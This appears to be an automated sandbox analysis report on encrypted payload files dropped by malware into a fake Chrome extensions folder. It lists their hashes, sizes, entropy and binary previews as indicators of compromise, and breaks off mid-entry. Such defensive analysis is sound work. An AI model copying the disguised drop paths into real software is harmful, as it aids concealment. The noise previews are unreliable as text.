SHA1:	ACB5E89E2BDD7F55D40BA521027D801D3840C363
SHA-256:	822635A3922E60D4FE7B361F602CBFD668D8CEE9447A0E47541A0789622153AB
SHA-512:	3E4BD8D2A0F81B6A83D58888F252976FC59A9764464DC23FD911E984E4B7CB61F20A6E48F53986170376EB10518EAE43058CF3FDA1CDEC31027BD2E33D4AA14E
Malicious:	true
Preview:	}...V\..k..>TXBc.F.M...{..J.-BZ.A:Y....BI.c[......+[5.v.t..D.u.^6..Y.$.....Q.t.H....k.L...v.t.5v.=.b..L...j]Edo.Z.\d.QN4[..].S\|.C...#.......{i.MHj...r....RE.1/.B...^J6.."...^. ....l.e5x6~9@.,Y.&..g.H,.D..K.`..u5[g...bZ.% f.......oQq..GL......F.Z&..Y....{.L...(Ako.8......:..&..$/...n...v[cy.M...L..M.q...a\|.....P.2Im.s........f."k..{......oe.<(G..8sp..S.Z.[.O..?.I]\|R?....w.n..j.....l.=..I...a.{...eJ.-..\|.O..h".?].7.'..>.......[.....g.e......b.y....8....b...\......=..L....X..A?...B+..)...s.4q..LT.lq.f.........~j.0n..Lox....[.....zdO%.Az.r.....i.-2A.....OA...1.Z..j....h........!G.....+. ...V...:.._....wM.gP....%.....E....h.).V.......t..f.V_..C..nO2..h.l......30(.ds...r6..ez."...F.x....U.y.....v7.h\|.N..7xC.2{y.b..0n.QIIRU..!.......V..W1i.=^..y.....-...T]..>9U9..q.Z..,.s....;.%hE...A.d....7.sb...p.....(3......G.h...m....W.hH5.jv.@*..DjV..+..y/.F.`..-...H..a7)...I.+......X..\|T.Y..{.......S.>)...n........dd.E.. 7I.Z.WUn._..d.D.mU.e..N...'..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.48

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	28032
Entropy (8bit):	7.992768273668832
Encrypted:	true
SSDEEP:	768:sPAPAuZEEvTcI+obiOwcV8dc+a1YrJAR0oyNPx:rLZZvlb1wcp+aY/LNPx
MD5:	9D8E43C6F6A0437CDC60634940ADE6B3
SHA1:	593F6EE506254CA335A8B3D20464FB785D4F14B9
SHA-256:	F50843C177C07596C5D13FC15523EE10D40E3EEE7E0181EDAE4F5F3667F9D730
SHA-512:	1031C252D0D77A580B1388249C213F7F2BDE5CE3AFE5E627425072A61340277846BB9C518C4835054125B31C94F1CFC49A1119BBD2B4B4EA80E450A389CC003C
Malicious:	true
Preview:	.P..M...o.........~.+.,,.....G.H..Ee..gP.mJ.A...D# ..z...............v..f9..;....H..s.);..1g.w.....I...@......o..<..n<so..-.'d......].&.%.7....A.6........TE......V.....)..~...S..,...6.~.2..DS7..{b[W.F&D..t..F].%v...g.-V...N+..@.....d..m.......1....6;....^_.M.b0PFl.)!?..3u.so.>v..U\|..Z..MO..Y3.. ..d.......)...&.,c.?.."w.,.`...%.'k.C.....>g.p....5..!...#I..8NXD(....iO..........$9....r1&..:..K.;...............v.@.h..t...J....N...i.B8m.m...m...`:..}sy...)b..38..avt...Y/&V..h.q....:U\F..YN.w.j..u...l..BI.^^....ax.".....o+...H..+...@....?.(..X.e....%..?..E.+\|..h..b...z.....K.......+...Dl..f..~{..2....}..U."./_....;A...@.ra...._$A....u.............Y..!6..u8.2w.T...5.....m...'nV........f.-._..0...G...U..v..rV......,Ov..,.4#.....l.Y...iH..P.P;{=5}..L...x......U.8..,2[T...m..a\.q.+.N....._.u8i.#d.4....!Yf.6...fd.'.tG..;>Wk..T..}..M.L..w..9.<:aLr..Ck>....O..*.n...%..CXf..z.x.......C{+H......$x.G....^....S..h.O...........@.1.=5

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.49

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	93294
Entropy (8bit):	7.9979775859394175
Encrypted:	true
SSDEEP:	1536:GXMMgrjGMVsyisWAOuxqJgMjQyPGsOCWftvuM7hmeK0PpGpmLM8sD8FXT:GXUHGMVsyifOCdjQyPdWftWM7hHGpmg0
MD5:	D156F2692D2595684BD3CE3EC5F37A38
SHA1:	7598E0FDB9A12AEF4C84421BF8B308AF82AE9A56
SHA-256:	80840A431D3021AA592E72BEE152CAE1AEBF2F81475692E02A7874481C2CD73B
SHA-512:	0E41534FE4FAC8BDD8E828BA98578BEAA281B1E356B9D1459DE67C09C346842A791A26FDC27A79F302F03CE8F16857CCB47B3E68593E8B99BD734B56A3FAF590
Malicious:	true
Preview:	.AI.m.......n+./.......K...Z.'_.-...l..'..M.....\|..6q...6M.s.Gb,..c....$m..e....6X\......La....Lq.F ."..>;..{d..r.n.~&....o-.j...........Cy.......%Y..M.... I..c...@.....\..9Y...D:3..4y.g+w.D.{$.t....W.Ts... .&.......?1.q....Hu@.6>b.tk.%A....Y.X..T./.L.f.c.....<..2...E..v..5.....Z.7.?Yn.c....;.[.._=....;3/.=HD..@.wE....b~..D....u..1.....Z7......"...0...g.X.s.4.y....je..m.d0[.. .n...1..X.x...55......1....{\..;T..... .h....0R..UD.8..(.B..x...\.cG..u.}8..g.o...k..@K.K.8M.)....\{..X........q.H.GO<..6......3..:...y.H.........#.4>h#j.r..M..?P{+...jx..?2.&..Z.7l.....]z.....c....XG#.muE9&..-I...w...+....]..YQ.......g.^..E.&/.)-.....,."....T.....t..6.y.h.........k.-0..N..^..jq....b0.--b.8.e..W.....C...9P4Hx;....v;.>.L.....cK....$t..:Ds...C.V.f.w........9.[.$).D......u.z..t.U4."F....%B8u ..`..yENe...q(.;..S.b.n.]\|4..N......y...c./1.....`&....V=}G.....s....F..nn...b..x.....!..~...3S.8>8.3]:.,........z......{..U...@2."i*%....]f...C..X...k...0r

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.5

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99237
Entropy (8bit):	7.998239611450476
Encrypted:	true
SSDEEP:	1536:v13/b24m8go97w69LJ10Mn+PKuIJFUt9d3igGf0JApvPbgsW7Q414LkY2:v1SI7w69LJH+yhJq3rG5pvTdQKwL
MD5:	C26CC642DD601D51D7A7DF598D64F699
SHA1:	A69260691F1E428E9378123112E748C94B3ABF10
SHA-256:	A991FC132AB623E18988A85999271634EB626C876847EEAA02E6F764E481BA0F
SHA-512:	5B86C7C06ED79D0DA84CDBBB1E75BD115926005C813FB008E5A865A8B2D1E0EAA885C52B2170B7186C7BAC9ABE05F56C4612A142CD67C92696B843CC6BB973F7
Malicious:	true
Preview:	..>..r.;B.`P.....\|....)N-..P......qF..S...H.s+.O...4\.$Y<.1R.~`..A.d..'k$.\E.._........=.gE..s.%..`.o..%....tO.....`..n...!.;Q....-.[-... ._.pX..N.ci.\|..zhO.T..N......H.&...H.[....0F..;.. Xg..9...y......kt..m.c..v.......#....xh..jiiV..9.(..>[.. P..M.Na}....1..\|......2......!.h..h.1..-.C...........^..S....C...^.j...{.J<t.!?..Q.%g..$y..g'.S?.i.Y&..0.J.'.'......&^.r}f.r..Y..{...._c....X....B....D..Qr./....v..1'... .k.,..{Y=..ww..M.!....._...l.Y..a-J.uA....".. ..t..k-..U...N N..D?. ..$. ..5.M.Sg...q.)..3U...V.N......m1....h..h`c_..,u.....V"........W...3......1.'....Lb....&.qW.p.q.gY.c(.[V.do.N..}..\|j.P..0...9..P..tv..r09.WZ..t.51N:/...2....{ .+.W..>L..(.@....4.n...q6..B;....1._.V.............Y...d....v...M...=........8..P.`..@sA.m.v..)..I\|........@.S.d!..c`....e)....kj.h .... ....A.VxUq.O<\.u...+D..9s..=..`..D....j.C{....Y...s...;....P.#9@..UO...\|3....2E..o0.D.w..4Na6c.C..P.L.....U!.......W*..N.%s.....7.]...>}...T.U[\|0.>..)U6....5..\......8

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	COM executable for DOS
Category:	dropped
Size (bytes):	32837
Entropy (8bit):	7.994487964618717
Encrypted:	true
SSDEEP:	768:izMjA84o8RAiJpEHDEHMraBYYK+5E/pUdamy0fZgroff5eZWD:izMjANQizEHDiMrGK1Udv7fZson5P
MD5:	DB1FFB5BCE3851DDFA2EC50514B3B6A7
SHA1:	8EBCD38ED798C79B3389D1AA3030E7609C09BD9D
SHA-256:	34397DE1D9DC94AAA08CA1D267B64B0E12CCABA008BABE6F592E563F00DC874B
SHA-512:	B9AE84D09E7C4EFAFF2A8374A1627CFF54EB4A43BFE7C9938FBBF803407B5DC84DE953FBBDC628B9CB39EC8C5AB886CA4F8117A65F49CDE7D2CCA9F1F839C03D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: Br_i421i2-2481-125_754864.msi, Detection: malicious, Browse Filename: 181_960.msi, Detection: malicious, Browse Filename: 232_786.msi, Detection: malicious, Browse Filename: zHsIxYcmJV.msi, Detection: malicious, Browse Filename: 18847_9.msi, Detection: malicious, Browse
Preview:	.$.:m.a.. Udh@.B...>2.......8+..(..+I.Q.....R]...T'..._...@ T....c;.E9:...3....e.;........Z.....+H..Z.!WXb.9.&...-.m..uP..o.....(.."...:.#r.9y...t.>..O.z....=.Z.D;...;;.....FY.A...T.C.......W..!9D.ob...EPW......;\|`.8R....&z.Qk.wz..w..[.....d...h..8.'..0.....C...!nm........}.....e.j..FL..>.e.V....hZ...:l........;m..W@.I.n.........B.9.u.1.t5=.!\|.+..Ci../...8.l}_ 2.M9.......e"..m....C...6.j.R.a..U.....n ........2.\....j{....:.+.F...l&.7..O.N....".zO.....}..]......\.RN.D...InW..X.J..E._t...e.n.R@..[.N-8......{....RY..\.E~.o.I../s............l.d.ZU..".-dt..\|`.A6.&.Z.4.Z".(5.'......'uCX..<6.......:..!...h.n.6Yl.>.....v.b..>..kb@.....<..PI...h+....f....j...2.L7D.Dt.@<....b.P.._..M.E..+5...o[..G...`Pj..J5f..^Z.S.....O........B...,;.............=UymZ..-1...M.1.E3....p.`&4...)..>W..w.o......QC.E+6.e).3..9...U`.._........r..GQ8QY.........y...*.7..bt.=..9..NB.$x.......Y.L...r..L.OZ.#y..5.?...c."&...;,h.P2&jF..y.X...f(..{...\h...'....'" .q.u....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.51

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	63988
Entropy (8bit):	7.997031990986062
Encrypted:	true
SSDEEP:	1536:9wlDRGx+2RCvu5IFZaHI2pyj1bEfSI8DWnubvzbsCHE:mlDRmsW5YotpOb88DWu/Ab
MD5:	4D5CC552AA2285B6B7A27976E589F607
SHA1:	20AA76BFC2A3877F87883C510F2D0E4A20136E32
SHA-256:	2899D6838DB152DF23B5F17F988160FC48F3973DA2DC9CF2BD3BFB029AF5A1C5
SHA-512:	43AC789C17312FB7BEB42E6CD7EF27EDC8841D7DAACED6DDE9A528F76782B571C5BE8384088094CF721A45DE54446D7DFF4556325E082D66B2600AFC8F9F7B1F
Malicious:	true
Preview:	Y...c...R.#..5.@.'..."...I.%..f....O8...9.....D..p.....NU..\.@B..p_..'..D.k.`]...xE.1...O8.@q...X.0..Y...,6..u^..C.j.A.oaS.{.]u.\|..E....O.b......z....d.S.H..&R..WK..s,H..s..epH.(b#:.X%.z.....t....Z..-..N.if>.....>_L...JH...Z...7....T.o..........?.1RFyu.....#.D..@8...}....`R..n3.E...@.gL>..a^....U:^..--P.7k-.A........O}....;.NC.d...<i.L\|..........`L............1..$Mk.u...9)....?Q.1V......C...P..I....1..-7#....N.< ..z\..`..8..u5.......A.SW..........-.3n+...x..Q...[U.....{.[....`r....gX.......q..aV.....=...]>y..Y.f.D.B.....6..........TC.>....ZzEM~jl..P....'r.t..r...P..Z..:O..bNZ?......Z.-...%.....~..yi...0..b.-...e..nI>.1?.[..........+.R.C.N.q.5w.......1..J.[.ZAM...%H.l......q...}U......./..e..w........[....2..L..C..=..jJ.k..S.IQ...k{.tM...E{d.].&.\.)..... .>.yO......(..}V#x.<.U..Z...'VZ`...C.~&.E.g....{..fJ...%..'.Ol..y.V...Cl....."..(J?.4/4#.....fIq.cs"JW.8q$J.8.....n...K\|.#......g....{)..p.w.qn.>J.Y..h........EZ<...<`.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.52

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	42334
Entropy (8bit):	7.994972834673255
Encrypted:	true
SSDEEP:	768:bsMNJmKf8DSbUkChIGEM4Q7sc8W4su3YE03jNR8KFnWDz51JKq6wu:bseJHIEVXp3YXlniz51JTFu
MD5:	F23A5FB6A22EC1A42CECBCCDEAFB27DF
SHA1:	E03C213DB03FBF91635B2D2693F0F0C5A319728E
SHA-256:	B67DB4FDE2BF13D2BB292AD6506A37DC48610A82EDC71F685253D67E248CF379
SHA-512:	360B130CD8FF166E936F2C21A6778161B7BAE0E8B8C2E1B2318CE851C3D891951E82B236559F7E256B084CA4A846A58441957D6A9B7FA34CEBC3120C49F8BC17
Malicious:	true
Preview:	.B.+`.....<]T..4k..........!....3.z..x...!.]=.........y..L.v~<.cT.C.....{..,....0N1{...=...f.{.1&.g+H.M......../.3%.O/.....A..c..."...k..I?&.b...3..I,^Z..5Z.l..~\.!.B0t...`.>\|e..X..T....kS..b~.D.?...+J....N...'m.F.....%VE.2Q.1.%h......}K6=X.r"<...{.....I.:j......%U].VS.n9L..M<...G.....BYi.J...k.QH+...m.....T...dc.~2A.79.=..-.^..@.W7...(qA../..8.$.i...l...G..,.l^.b.AR....(....I/l.`zI........Ex....I.....u.PSLC..z.....KC....p.s.........X.sJ....e......<.....f.....:b\|_..h.....{..GWa.\2....d.......lb.y.1c. fw.?.....ET=k.....1..].$...y.'#a...E@.tr.s..=......'.&H..@S}o.....j..MC..A .......t.4S.........T6..X(.A.....)z.W)..R....X....f0..~...\|Zw.,T6...'.K...iY..4.q..0.1e..).1..Re2!?.u.O}..C.x.5x{&.....yJ)K....@..........J~F...]...qNr.._..h.........Pi%VZ..g..o,..M.........k.M.3..e.!ef....\m\...N.y;..d..nhwfl..Bp\|..Z2.:YG.5...9p.=.u.....n...v......T.yA../4.?..<.Qs..3......??.q....2...x...i..........5.}>..kyY4.YE3F....K".C.[..f.@`

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.53

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98025
Entropy (8bit):	7.998074237488327
Encrypted:	true
SSDEEP:	1536:/kicEGiOnccTuHcesv+ZAWwttGj7/mOyb3kFRb4eDmolQX2IO/q15RVsK5mZfcs:/lcO8esWZ3w22Nb0FRbKEQX2IqK5mh/
MD5:	FC88C05D5B0283D962D13EA2EC177688
SHA1:	6C2DE92FA17C52F42211CE4C0FE9D22AEC382537
SHA-256:	E4465FE9F964359DC59F6508D73FFA017EFD4440E116E843B486F304BACC73CC
SHA-512:	127C3FE23A8EA58665E71682DD909B1E954562D1377281407B7056DD365A24A3575F6E21FBDAB9E2EEC992608E7E5CC5C3C43F801A078A1FE35D494BFCC8067F
Malicious:	true
Preview:	/.P3...E.{...b..&..{.A.6...:...f.S.8.`B....t".[q_.4..h...A...>....,.,....N.....F...e....7.`"W...x.Z..X...Cw.B$4.?R...<~...<...q-V.~..Bs...y..B..E....6..e.<,^^...'.K.Y...B...N.....<,......Q.d.3R..Q..X.ln(X.Z,IB.....sS<....?....[..!..c.E)r.....A..z..H.".x"@@.Qf..%).G..@..."8\|....U....y.k.H....V5j.V.....x)/..y.N= ~.hs[aZ..".c#...R.+,#...Jj'.8e.$s...Z..oX{.j..\|..O.'E...=.dY..).....%.U......T...._.......#<..ap.I`1,.L.TVs.S.".)..y..A{.@.'..<....$..(4...b-..)...)....I .9JrT.7......p0.&.u...0vA&qa...a..;....i.-..Db......@..o.....t.%.vG.. .......'%.>;A.6A...v.....'!}.$."9...%..k..\|....z...W....Q......>..>...H.....<.rXYW..."".....@.~Q\........\|.tI..M.\|A$E...2UF....H....m..eJ.p.%.9].(.=.k.3.j..1RU?4Y-.{.T.....e.!.A..+..'....+.].~....8........f..^E......[X..cj....(p..B..\|...6.Y.%:.......$..-/cg".[.R?C"}l....S.......,.OU..P..j.o...._H...w.1....z..Xy.........l.....8.Yl.N.h.m.;..!..\|........m`.h&..:................./.m[~.r+E.\.&...}rl. C. ...ek

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.54

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	37714
Entropy (8bit):	7.995314097222126
Encrypted:	true
SSDEEP:	768:QAe3p4aYHCvf9SX8kkpTrtIreJdq5SjKiKVmx22bWaX2waTg:fe54aECX28kkp1dJagKiQm82H23k
MD5:	59C6178D0D65B782B2CEA581172D64C9
SHA1:	7AA2BA64047A3F7E72D92C11C572C442CD4C1702
SHA-256:	19664EF5B6D64266FD524121869D779D6C9138CAA55D28870B64FBD2D1EE9073
SHA-512:	1BF44F643FF22D91FCCEE38A4B5C9E21CED91D70651FB67272D660570EB9F0B02834A7F70C672D5D3D5C58BB86F9DC3F048C900AF99749CD90774ADA48073ECF
Malicious:	true
Preview:	DV...6V]H}.D.].Q.(.....i....l.(!..~}g.y...EP0.X..5..a.\|&A.J..g.#u.U#.'...=...............:x2u.._.iui.#.f~.b....f.Y..>..m...q.lC..8d....5..?A..5.7..,...q#............s.~=?6&Lg....z....tm1.e.g..#....N}~.Q...~wq...eI.b.N.;........e.....$s../E....\|..8i.m&..]........C.....Qw../.........E...l.<...P.+b...N..(.^S.M..X.. .T...'.....8..I)'......kk...v/.R-8..2....t.p..oA.r..6...HL.d{.oF...4.u.b.....o...d...h.0`E..oy.R{k>I-.I.`=..f_....q.n......oe:.>.'.=R..............S.H.J.?M.k.3.NW@...B.Dy.#T...Fi...^...E..+!..j..........p= ...U(.....M....h...I.C...!Um%..kk..W^.^@<'.=Ql.\.'....3.h.......f.(<.#..1.......K.7K....<,A.t......<cF....%.N]f....g.`u\|k..i...r.(........@W..}..d.{...F..b.I.LC..#Y.}.[..ejb.....w..L...]f.\|....pqK-........_<.B.}Z..Q..9.m..j.............U..D.J.W.\|....W.dQ#^..J....1n.t....W..l)....!..[O...p.......F...Y..y..6\|8.n0..g.$!@#.~E...;".>..5U.\9.......9....s..L.\....Fl...Nv....(..t.q..L`5.....9.?.....{.....-.:y...u.6....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.55

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	53045
Entropy (8bit):	7.996749714967816
Encrypted:	true
SSDEEP:	1536:vPyl56sgjNlbkbEzqYzTcduYfdjD5RZlvIQVwHWT1vYOb:Sl59EfkbOqYnuuwlvIB+h/b
MD5:	4ED8227029ED424E5273F4D8FFC0F7AD
SHA1:	F529AAA7917B29C4B6444ECB2E37608905017A07
SHA-256:	00A1089AFD9D8D0E1F2157B75556DC5F86A5D89C1571055FFE1901A0416A3C3F
SHA-512:	B7ADCD1DBBC1FC061F37053949AB2B903D830DB28514DD8E9E16561FFABF1313114F46127B07C2B0E3B9191CA88902E0F4FC4907DA6AAE264C9B302CDCA98F69
Malicious:	true
Preview:	..R.`..\..l..L5..W.'...VI'%..=>.O....".{Z]......Xq"h=F.=.../$..:3.M.q.h..-..C1u......D.....G...l...n.......d.3..K..o.....M!.[.6....>;p...q.a@R.hAZ4.P.....0.~[..u...9...H.O.f....q?.o.d.]..^.?.'.jK.........3:.Nr.v.t^T..S.Cj.'4Z9..uw...&....#...o.m...y.~.Iz.R-X...d.<.Q.......... ..L..#w..:....S..O...bt.U..?:3.A..e.}...}.uC.^i.$<.g....qO.UT....n^.....,c..Y"Su#....!.C$....M......k.._.=.....E...)q.mR12`.Wr...:h!......NyC%,&.:r..O....{...y..@."'..o..+..+w.k.0+.....ykD.\|Z.lo6..Z.._.......4..B..D...D.qc.H.=..p.FXxF.h..r...S..v.w..F.V......eF.\|....C....}{..H.!..G.;...U.9..Y.vwj..... ... .....b...b.G..xh..2..........9g.XA...r.,..gh..Y'..`...:"...........g....H.nVE...s6+.F......+.,^.l.z..%........o#...C.....#}.n....K........J.W.<.&..^.*.k.{.?......U-....a..y.1.._..Y...K^1.r.%q......W...?....6.v.P....;..r3....T........~c.by!!..f'./.'......W....]A].8m\.+.6q..E...h..c._.I.R....ul..`.^......w.J8....R.`.:...LK.8(]Z..u.?R..)..G-.9k...wV:g.a.e..Hb..>.uO...z_

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.56

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31197
Entropy (8bit):	7.9947487160338735
Encrypted:	true
SSDEEP:	768:w1n3Qf6+OtCQKM26WTuQu6RGvqgubHJkR2c/:wqSFtmMN36YyFkR2c/
MD5:	F8076A297C5D7DC010A796C47B16B247
SHA1:	C697BBD2827A3BA0E78033D5BD3575024060CC2B
SHA-256:	BC2DAE78F8E98687FFF4CB85C234023103FD8E5B3CB5791DFD314201A4765483
SHA-512:	CE84BFAE4952B64D81A772B53CAF8A27974923A717BAE517688B8A78CA542C2D7C430F499A08367C181C5246513B9063D75B716B73CFA196D99B780A745DF43E
Malicious:	true
Preview:	..?..c.h.[&......~..wZ....M.p.s&.......G..B....I..\v.k..T.....;..v/...W_5.K....Pv.....7..=.....5..#>gz0....s..ru.dO_...XGO.eUG?.U"(Xq..a..\|.....!..q...^...QA...l...Y.D.h.R ......s.........d..Sck...D...qa....f.A.d...).).....$(M.T)a..d...)s...N)..w.J..2^./..,..c.....Ed.u..'...+...!T.k...L s...a...)..1..#.~w.tZ..F....0u...>.Sft.K.1..\x.. yq.P.C.......P.E....k...I..."0.).....Q.k..Z{....e..i#<(.@.B...rw=k..Ni..y.IWBw.x........}y...M..%h.....n..#.r.,&:...\T~_.%x....Y...`m/P..9...Q......E.%.ft.....\|....I5...k.C^...b..#..,G.Y.Ve..=.^.\...].<...&.:."......)&..e...t.<....4<.:.@i.o...N.R..pI.W.u.WX.;...Sy...j...s..p..!..H..2...(.....x.H.=.A.\|c.+...!L...........j?.^o.....~e..e....@m.>........*..bU.?.ppI.......mL..).1G....E.l...q3......f.CE.X.:.C....$:..T.>n.'.A....L....ohb....9....$..C..E."f...h..!.L....v.G...yX.......7..RZ..E...#.b2.X.b.+..%..D......s..%.y....,A...A1...y./.{........m..`......c.F......G.D.....f...D(q5G.Z.<B.....^.%/Q./..{....Y.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.57

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98424
Entropy (8bit):	7.998284093395694
Encrypted:	true
SSDEEP:	3072:RbfZf1MdGn8q+n+r7y7N8uO//57yA5PJ6TdboeOmn64tB5p:tfZSdGn/o7KJPh6J0eOmnttZ
MD5:	D04D3B69DC546BE663E3CBF091B9A823
SHA1:	F3C11661D2FCC9BAB98A958AF9AAE2F8A0B626D5
SHA-256:	963C269A77DD52561168EF3F89D617851E305F3D292031DC6AE6F96B148F07AF
SHA-512:	AE90179356203F617687776E8358E619C3663ACAAE8A1AB2399D1AE861DAF6D23F7CAD6CA978BB9D625C189C5AAA9595C3E0031E7187355FD6C3F08A688DDAC6
Malicious:	true
Preview:	+\J..]ftT.[....Xm......a+.5Y...a..C.........1.>.......$c&.+.P......m..:.L.G...f 6.....v)...q.Y.@:.....}..V.R..e.9......\.E. ...b.....N.tHk.u3.`.L.E....c.u......jq..=_.......h...0... .D.eA.A.}....KP.oC..b1.dPq...b.....{....@..\|..P6....6...6$....6.;6S.s6.rO.a....?.;.Y14.....Iy.F..vD...W.../..v..r....z..t.R1.2...u.l&....>D'....6.V$y.....8.T.I..V.....7</t/L..LQQ.gm.1.0.9...'._L.`.dY..E tLs...Q..q.j.c.]+v..on.n.31u.v/^.../....Q......u....^..sD`....R3.....y..r..t........X\|.>..t.....g=.....wkOW.Y.d.L.G..F..Mo..sC.......< .I .......)\...Hu./.........\|...R.)..~t.P...0Y.."....fQQ.Nq...+..<...4..n...f..&=l...w....k....-n..a?Q9..o...].W'.S.gT.r;.h....O..Y'.vK.....)j...+.m=.&_E..sB..y$....."..D..N..a+..<..w..u7..c..G...&.d.p...s.../.i.J.#..L.......j&.r`..1.2..($Z..=.......t....4(/.K..D.>s.....7H..{..ab].e.Q.j.. o.!.wb=>L......M..?......g,.}....]..b.>.M...d..............bt?-..8.S.#W.i...Dcn.......W4.=../.....~6.+.>.}..........!.O.(.$..W.Y.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.58

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	23022
Entropy (8bit):	7.992462151837211
Encrypted:	true
SSDEEP:	384:UF0U4KO3dkZdhmTY4KjSnyKh+Yxz5rwtJBfgEE9cbU5H0f0fDA5++bJqEOes/gOT:UF0EWiZdhFL5KhbJe4EEubU5H04+bJXG
MD5:	1E86C96F528D9CAEAD6A160380F08A95
SHA1:	999520E27E7B2AAE8071C167DF024437D57EA16E
SHA-256:	5BD009392E87EF83B1F8CA8F29923441B3A9D56A8698B3CB04EB52448479DC1A
SHA-512:	56FC473827A6E3B3862B82954DC117053E5DC5E0D301FA166218C8F574F507AAA15C73FA741037EA03D088E2918316519661AA65A56B6068C99BAEF8AE97BFA8
Malicious:	true
Preview:	..........S.. .......z....q.L.4._.x9._S.......?;f..[...;.~..\|....8d..(..7Y~.f6v)...:(.....E5.7....._..Y.Nj...uq....H#m.JC.L...~._...., o\|:....R.?..N....<..f...$.8.l..H..p...-..x..i!.9...~.........L...(C.~..[...j.T...@....E.\|.<...q..'.......... ..{.Dc.............fR....>...e..K\|.4p}.z,....z..^......=..6Y..A...nJ...F<<^...BC......D..6.YP.JP..&~........f.v.tO..K.N..aNJ>..%RM.O>.../.}.~..Y.Q(..j.8p..`..[.......1......JL....p"...k.............!t....;`..+h.....B..g:..d.c....f....&...b.M0....l......O>.9>b.D..{.c.n..i6.....".X.P../D..u.u&..^=2..o...^.....`.S..n....&4..{....Ph.3......cn.0....c.S.Hx...Y.\|...b.........h...`gc{..>...a...g..;<M.4o..M.......F.......(.B...*..5.lL..u.Y.AF..`."j.H,...%^..].7v..0..&..2.L_.~....=M.^._.975.......!.JR&....$8..s......3e...>._2.g3N..x...H..v..f.5..e......E..)..NM..Ic...p../4.f.u>4...M..u.o\.jC...T..v{2..}.:...<$TTp.c.5..L\|.........Z.!.]e.......{@.hB..r....y"5.>..S_.m........\8...U.O;v.Ho5.=i?..(... .k..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.59

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32649
Entropy (8bit):	7.9940987497850395
Encrypted:	true
SSDEEP:	768:AH5QSuwhSPUsmZgxs2fAy0M0ffhJl3INRN6jdV62qpPbVKn4Qm:AZQSuw2Uxixiy0RffhJVK/6BQ2qpPbYU
MD5:	765583B8D57070F481B9FF33C521F610
SHA1:	D169ED2B10681C351A18D9C1A07072F883CE07E7
SHA-256:	3B4B05C095909D0E1D1D1C98B956D7A53027FC1E4A13CEAFE31EE69DAE5E5E79
SHA-512:	7216F908A0503BE352DF51727CBC3E6202731633E40D1D161A373A2AB8650D57711AEFEB115C8559075876795CF346EAE6E61CE90839DAD6231650F15CCC7028
Malicious:	true
Preview:	Qq..zI.(..T.+8..."..\{9.N..iFd.%..(.71s.Z.:.q..}.$....>..pSM...!...\|N...D.I!.....N'(....}5e....k.x.nX..+c.5..U....?..$.../rc.. ..r.jE"...sgQj.h..K..D..4.%N ....$...s..~K...}x.1.....}.^l.V{......pC...KKbZ.^B.>z../U....z.>.W..:=...$M...!.KS.........S..s.7..U.Q.8.....M#&..z..ru...).../.J8..E..?..i?^(..e.QZa.Ot.9.{3.;ynv.t(.`..T.t..../.U.#.6..1..]dcj.\....8.%H9.....y.(..g .;v.....7...YT.C..'...@?........{..YB.;.na4.D.v.4:....Cz.-D...E.ZG...v...<:.D..... ...&VU....P...M.5.v....B3.Mj.t~.p....q.8..07F#b..g(H.gA.XW1Q&....1W..q.m3MbV?P@,...=a_'.C.Tk."..wD..0D.s....Z}.0..i..<.=.Q.....6.-b..S\|..Q..k..d.4q....}..].8....%.Jm0....&.&.o.....Jw.N.....`..H.r8v.L._&6_;..}....$'GTF_..e.T.8j..CQ0....\|..{..&.}+.Y"'Xr...crK..$..."..X..l.A.....Y.D...P.b..7F.U.];O...<.5!..E?U.GqO.-..}.%n..........3...v.^.,.\|.<.z..#.r.J..T.G..3...YL.<M.!.....ks.=....Leb]N...t..(m.={..?..3.T;?.2.0..,..Z...R..QeGa.........!.K.6. ..E.c..93.gn.y...9U..U..}.......J...............i

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.6

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	79975
Entropy (8bit):	7.997545621684208
